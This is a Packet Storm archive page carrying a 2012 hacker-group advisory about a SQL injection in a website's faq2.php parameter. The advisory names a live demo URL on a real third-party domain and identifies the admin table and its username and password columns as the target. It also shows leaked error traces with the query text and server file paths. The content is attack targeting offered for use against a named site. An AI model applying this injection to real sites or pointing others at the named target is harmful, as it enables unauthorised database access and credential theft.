exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

DGC SQL Injection

DGC SQL Injection
Posted Jan 28, 2012
Authored by Skote Vahshat

DGC suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | db7ffb03ff9ab63dcbcc4373bf434d417892efaf1a84b13e2d55267701ad9094

DGC SQL Injection

Change Mirror Download
|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|
|* ______ ____ __ __ |
|* /\__ _\/\ _`\ /\ \/\ \ |
|* \/_/\ \/\ \ \L\ \\ \ \_\ \ { Turki$ hackers } |
|* \ \ \ \ \ _ <'\ \ _ \ |
|* \ \ \ \ \ \L\ \\ \ \ \ \ |
|* \ \_\ \ \____/ \ \_\ \_\ |
|* \/_/ \/___/ \/_/\/_/ |
|* |
|* I'm Wolf Long live wolf |
|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|
=======================================================================
\* [Title] :[dgc sql injection vulnerability] /*
\* [Author] :[skote_vahshat] /*
\* [Home] :[Http://turk-bh.ir] /*
\* [Email] :[skote.vahshat@Gmail.Com] /*

=======================================================================
/* Web Server ==>> [ Apache/2.0.55 (Ubuntu) PHP/4.4.2-1build1 ]
/* Powered-by ==>> [ PHP/4.4.2-1build1 ]
/* DB Server ==>> [ MySQL ]
/*
/* [+]Exploit :
/* http://www.target.com/faq2.php?id=[SQLi]
/* [+]Demo:
/* http://www.dgc.ca/faq2.php?language=0&id=173&faqid=573
/* [+] Tble admin:
/* bs_availability_user
/*
/* [+]column name:
/* username pass
/*
/* [+]ErroR injection:
/*
/*
/*/-----------------------
/*

/* SELECT * FROM faq WHERE id = 573
<?php
= array (
0 =>
array (
'file' => '/mnt/alpha/dgc.ca/include/faq.php',
'line' => 26,
'function' => 'querydb',
'class' => 'faq',
'type' => '->',
'args' =>
array (
0 => 'SELECT * FROM faq WHERE id = 573\\\'',
),
),
1 =>
array (
'file' => '/mnt/alpha/dgc.ca/include/faq.php',
'line' => 20,
'function' => 'load',
'class' => 'faq',
'type' => '->',
'args' =>
array (
),
),
2 =>
array (
'file' => '/mnt/alpha/dgc.ca/faq2.php',
'line' => 150,
'function' => 'faq',
'class' => 'faq',
'type' => '->',
'args' =>
array (
0 => '573\\\'',
),
),
);
?>
/*
// QUERY: SELECT id FROM faq WHERE parent_id = 573\' ORDER BY display_order
<?php
= array (
0 =>
array (
'file' => '/mnt/alpha/dgc.ca/include/faq.php',
'line' => 201,
'function' => 'querydb',
'class' => 'faq',
'type' => '->',
'args' =>
array (
0 => 'SELECT id FROM faq WHERE parent_id = 573\\\' ORDER BY display_order',
),
),
1 =>
array (
'file' => '/mnt/alpha/dgc.ca/faq2.php',
'line' => 151,
'function' => 'get_children_ids',
'class' => 'faq',
'type' => '->',
'args' =>
array (
),
),
);
?>
=======================================================================
|_***_| spical thanks : bl4ck.viper ,dr.tofan , nafsh, netqurd |
|_***_| tbh team , cyberwh team , all turkiS hackers|
=======================================================================
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close